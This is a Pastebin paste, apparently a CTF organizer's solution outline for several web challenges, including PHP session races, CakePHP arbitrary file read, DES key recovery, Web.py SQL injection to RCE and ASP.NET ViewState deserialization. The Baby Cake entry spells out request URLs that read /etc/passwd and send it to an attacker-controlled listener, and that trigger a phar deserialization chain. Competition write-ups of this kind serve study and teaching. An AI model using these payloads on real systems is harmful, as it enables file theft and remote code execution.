API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 21st, 2018
167
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.10 KB | None | 0 0
raw download clone embed print report
  1. One Line PHP Challenge
  2. Difficulty: ★★★★☆
  3. Solved: 3 / 1816
  4. Tag: PHP
  5.  
  6. Source Code
  7. index.php
  8. Solution
  9. P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
  10.  
  11. Control partial session file content by PHP_SESSION_UPLOAD_PROGRESS
  12. Bypass session.upload_progress.cleanup = On by race condition or slow query
  13. Control the prefix to @<?php by chaining PHP wrappers
  14. exp_for_php.py
  15. Write Ups
  16. TBD
  17. Baby Cake
  18. Difficulty: ★★★
  19. Solved: 4 / 1816
  20. Tag: Code Review, PHP, De-serialization
  21.  
  22. Source Code
  23. index.php
  24. Solution
  25. Due to the implement of CURLOPT_SAFE_UPLOAD in CakePHP FormData.php. We can read arbitrary files!
  26.  
  27. # arbitrary file read, listen port 12345 on your server
  28. http://13.230.134.135/
  29. ?url=http://your_ip:12345/
  30. &data[x]=@/etc/passwd
  31.  
  32. # arbitrary de-serialization the Monolog POP chain
  33. http://13.230.134.135/
  34. ?url=http://your_ip:12345/
  35. &data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache
  36. exploit.phar
  37. Write Ups
  38. TBD
  39. Oh My Raddit
  40. Difficulty: ★7★
  41. Solved: 2 / 1816
  42. Tag: Observation, DES checksum, Crypto, Web
  43.  
  44. Source Code
  45. app
  46. Solution
  47. Know ECB mode from block frequency analysis
  48. Know block size = 8 from cipher length
  49. From the information above, it's reasonable to use DES in real world
  50. The most common block is 3ca92540eb2d0a42(always in the cipher end). We can guess it's the padding \x08\x08\x08\x08\x08\x08\x08\x08
  51. Due to the checking parity in DES, we can reduce the keyspace from 26(abcdefghijklmnopqrstuvwxyz) to 14(acegikmoqsuwyz)
  52. Break in 1 second with HashCat
  53. Break in 10 minutes with single thread Python
  54. Write Ups
  55. TBD
  56. Oh My Raddit v2
  57. Difficulty: ★★
  58. Solved: 10 / 1816
  59. Tag: Web.py, SQL Injection to RCE
  60.  
  61. Source Code
  62. app
  63. Solution
  64. Read the package version from requirements.txt
  65.  
  66. Remote Code Execution in Web.py framework
  67.  
  68. exp.py
  69.  
  70. Write Ups
  71. TBD
  72. Why so Serials?
  73. Difficulty: ★★★★
  74. Solved: 1 / 1816
  75. Tag: De-serialization, RCE, ASP.NET, View State
  76.  
  77. Source Code
  78. index.php
  79. Solution
  80. Get the machineKey in web.config by Server-Side-Includes(.shtml or .stm)
  81. Exploit ASP.NET ___VIEWSTATE by ysoserial.net
  82. Write Ups
  83. TBD
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!